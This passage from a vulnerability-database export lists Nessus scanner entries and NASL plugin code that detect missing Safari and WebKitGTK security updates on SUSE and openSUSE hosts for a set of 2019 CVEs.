"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "nessus": [{"lastseen": "2023-05-24T14:11:36", "description": "The version of Apple Safari installed on the remote host is greater or equal to 12.0.0 and prior to 12.1.1. It is, therefore, affected by the following vulnerabilities :\n\n - An out-of-bounds read was addressed with improved input validation.(CVE-2019-8607)\n\n - Multiple memory corruption issues were addressed with improved memory handling.(CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8611, CVE-2019-8615, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623, CVE-2019-8628)", "cvss3": {}, "published": "2019-05-15T00:00:00", "type": "nessus", "title": "Apple Safari 12.x < 12.1.1 Multiple Vulnerabilities (APPLE-SA-2019-05-09)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623", "CVE-2019-8628"], "modified": "2019-05-15T00:00:00", "cpe": ["cpe:/a:apple:safari"], "id": "700666.PRM", "href": "https://www.tenable.com/plugins/nnm/700666", "sourceData": "Binary data 700666.prm", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-29T14:26:34", "description": "This update for webkit2gtk3 to version 2.24.2 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8615, CVE-2019-8611, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623 (bsc#1135715).\n\nThis update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {}, "published": "2019-07-22T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2019-1766)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623"], "modified": "2020-09-23T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-javascriptcore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-webkit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-webkit2webextension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:15.1"], "id": "OPENSUSE-2019-1766.NASL", "href": "https://www.tenable.com/plugins/nessus/126901", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-1766.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126901);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/09/23\");\n\n script_cve_id(\"CVE-2019-6237\", \"CVE-2019-8571\", \"CVE-2019-8583\", \"CVE-2019-8584\", \"CVE-2019-8586\", \"CVE-2019-8587\", \"CVE-2019-8594\", \"CVE-2019-8595\", \"CVE-2019-8596\", \"CVE-2019-8597\", \"CVE-2019-8601\", \"CVE-2019-8607\", \"CVE-2019-8608\", \"CVE-2019-8609\", \"CVE-2019-8610\", \"CVE-2019-8611\", \"CVE-2019-8615\", \"CVE-2019-8619\", \"CVE-2019-8622\", \"CVE-2019-8623\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2019-1766)\");\n script_summary(english:\"Check for the openSUSE-2019-1766 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"This update for webkit2gtk3 to version 2.24.2 fixes the following\nissues :\n\nSecurity issues fixed :\n\n - CVE-2019-6237, CVE-2019-8571, CVE-2019-8583,\n CVE-2019-8584, CVE-2019-8586, CVE-2019-8587,\n CVE-2019-8594, CVE-2019-8595, CVE-2019-8596,\n CVE-2019-8597, CVE-2019-8601, CVE-2019-8607,\n CVE-2019-8608, CVE-2019-8609, CVE-2019-8610,\n CVE-2019-8615, CVE-2019-8611, CVE-2019-8619,\n CVE-2019-8622, CVE-2019-8623 (bsc#1135715).\n\nThis update was imported from the SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1133291\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1135715\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.1\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/22\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.1)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.1\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libjavascriptcoregtk-4_0-18-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwebkit2gtk-4_0-37-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"libwebkit2gtk3-lang-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"typelib-1_0-WebKit2-4_0-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit-jsc-4-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit-jsc-4-debuginfo-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit2gtk-4_0-injected-bundles-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit2gtk3-debugsource-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit2gtk3-devel-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit2gtk3-minibrowser-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit2gtk3-minibrowser-debuginfo-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit2gtk3-plugin-process-gtk2-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", reference:\"webkit2gtk3-plugin-process-gtk2-debuginfo-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-32bit-debuginfo-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-2.24.2-lp151.2.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.1\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-32bit-debuginfo-2.24.2-lp151.2.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"libjavascriptcoregtk-4_0-18 / libjavascriptcoregtk-4_0-18-debuginfo / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-24T14:25:42", "description": "This update for webkit2gtk3 to version 2.24.2 fixes the following issues :\n\nSecurity issues fixed :\n\nCVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584, CVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595, CVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607, CVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8615, CVE-2019-8611, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623 (bsc#1135715).\n\nNote that Tenable Network Security has extracted the preceding description block directly from the SUSE security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2019-07-16T00:00:00", "type": "nessus", "title": "SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2019:1850-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-6237", "CVE-2019-8571", "CVE-2019-8583", "CVE-2019-8584", "CVE-2019-8586", "CVE-2019-8587", "CVE-2019-8594", "CVE-2019-8595", "CVE-2019-8596", "CVE-2019-8597", "CVE-2019-8601", "CVE-2019-8607", "CVE-2019-8608", "CVE-2019-8609", "CVE-2019-8610", "CVE-2019-8611", "CVE-2019-8615", "CVE-2019-8619", "CVE-2019-8622", "CVE-2019-8623"], "modified": "2020-01-08T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0", "p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0", "p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:suse_linux:typelib-1_0-javascriptcore", "p-cpe:/a:novell:suse_linux:typelib-1_0-webkit2", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource", "cpe:/o:novell:suse_linux:12"], "id": "SUSE_SU-2019-1850-1.NASL", "href": "https://www.tenable.com/plugins/nessus/126740", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2019:1850-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(126740);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2020/01/08\");\n\n script_cve_id(\"CVE-2019-6237\", \"CVE-2019-8571\", \"CVE-2019-8583\", \"CVE-2019-8584\", \"CVE-2019-8586\", \"CVE-2019-8587\", \"CVE-2019-8594\", \"CVE-2019-8595\", \"CVE-2019-8596\", \"CVE-2019-8597\", \"CVE-2019-8601\", \"CVE-2019-8607\", \"CVE-2019-8608\", \"CVE-2019-8609\", \"CVE-2019-8610\", \"CVE-2019-8611\", \"CVE-2019-8615\", \"CVE-2019-8619\", \"CVE-2019-8622\", \"CVE-2019-8623\");\n\n script_name(english:\"SUSE SLED12 / SLES12 Security Update : webkit2gtk3 (SUSE-SU-2019:1850-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.24.2 fixes the following\nissues :\n\nSecurity issues fixed :\n\nCVE-2019-6237, CVE-2019-8571, CVE-2019-8583, CVE-2019-8584,\nCVE-2019-8586, CVE-2019-8587, CVE-2019-8594, CVE-2019-8595,\nCVE-2019-8596, CVE-2019-8597, CVE-2019-8601, CVE-2019-8607,\nCVE-2019-8608, CVE-2019-8609, CVE-2019-8610, CVE-2019-8615,\nCVE-2019-8611, CVE-2019-8619, CVE-2019-8622, CVE-2019-8623\n(bsc#1135715).\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1133291\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1135715\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-6237/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8571/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8583/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8584/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8586/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8587/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8594/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8595/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8596/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8597/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8601/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8607/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8608/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8609/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8610/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8611/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8615/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8619/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8622/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2019-8623/\"\n );\n # https://www.suse.com/support/update/announcement/2019/suse-su-20191850-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?983d9f97\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Workstation Extension 12-SP4:zypper in -t patch\nSUSE-SLE-WE-12-SP4-2019-1850=1\n\nSUSE Linux Enterprise Software Development Kit 12-SP4:zypper in -t\npatch SUSE-SLE-SDK-12-SP4-2019-1850=1\n\nSUSE Linux Enterprise Server 12-SP4:zypper in -t patch\nSUSE-SLE-SERVER-12-SP4-2019-1850=1\n\nSUSE Linux Enterprise Desktop 12-SP4:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP4-2019-1850=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-JavaScriptCore\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:typelib-1_0-WebKit2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/12/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/07/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/07/16\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP4\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! preg(pattern:\"^(4)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP4\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libjavascriptcoregtk-4_0-18-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwebkit2gtk-4_0-37-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"typelib-1_0-WebKit2-4_0-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk-4_0-injected-bundles-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"4\", reference:\"webkit2gtk3-debugsource-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", reference:\"typelib-1_0-WebKit2-4_0-2.24.2-2.44.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"4\", cpu:\"x86_64\", 